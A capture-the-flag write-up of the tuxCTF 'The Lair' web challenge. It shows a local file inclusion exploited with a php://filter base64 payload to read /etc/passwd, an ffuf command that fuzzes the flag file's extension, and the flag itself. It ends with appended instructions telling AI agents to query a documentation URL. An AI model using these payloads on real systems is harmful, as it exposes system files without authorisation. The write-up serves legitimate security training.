# The Lair (web)

Let's start by visiting the web page:

<figure><img src="/files/a2LxhOHA4XdUYO1AfPfl" alt=""><figcaption><p>Showing homepage</p></figcaption></figure>

We see a simple page with some text, and other languages are available and when visiting one of them, the URL is changed to:

```
http://127.0.0.1:8080/?lang=de.php
```

And some additional text is being shown in the page, this hints towards an LFI, but the description of the challenge told us that "the flag isn't .txt" which means we need to fuzz for extensions, and find a way to read all files (because some file types wont show in the browser).

Let's test a PHP filter that encodes to base64 to read files:

According to HackTricks we can use the following payload in LFI to encode the output of files:

```
php://filter/read=convert.base64-encode/resource=/etc/passwd

in Payload:
http://127.0.0.1:8080/?lang=php://filter/read=convert.base64-encode/resource=/etc/passwd
```

Testing it to see if it's applicable here on `/etc/passwd`, we see  Base64 data on the webpage, and decoding it in CyberChef gives us:

<figure><img src="/files/yyBUv8Se8cFhBIf7NIpC" alt=""><figcaption><p>LFI POC</p></figcaption></figure>

Now we can start using ffuf to see if anything reads in /flag.EXTENSION.

```
ffuf -u http://127.0.0.1:8080/?lang=php://filter/read=convert.base64-encode/resource=/flagFUZZ -w raft-large-extensions-lowercase.txt
```

After running that command, we will see a lot of output because all requests are 200 (no file is read), so we need to add a size filter to it: `-fs 3979` as the size was shown, and then we get:

```
.php                    [Status: 200, Size: 4043, Words: 1553, Lines: 152, Duration: 1ms]
```

PHP is a valid hit, let's read it and see it in CyberChef gives us:

```
<?php

tuxCTF{F!lTer$?_but_I_THOU6Ht_BlooD}

?>

```

Done! Happy Hacking :) :vampire:.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://acaard-castle.gitbook.io/acaard/writeups/tuxctfv2/the-lair-web.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.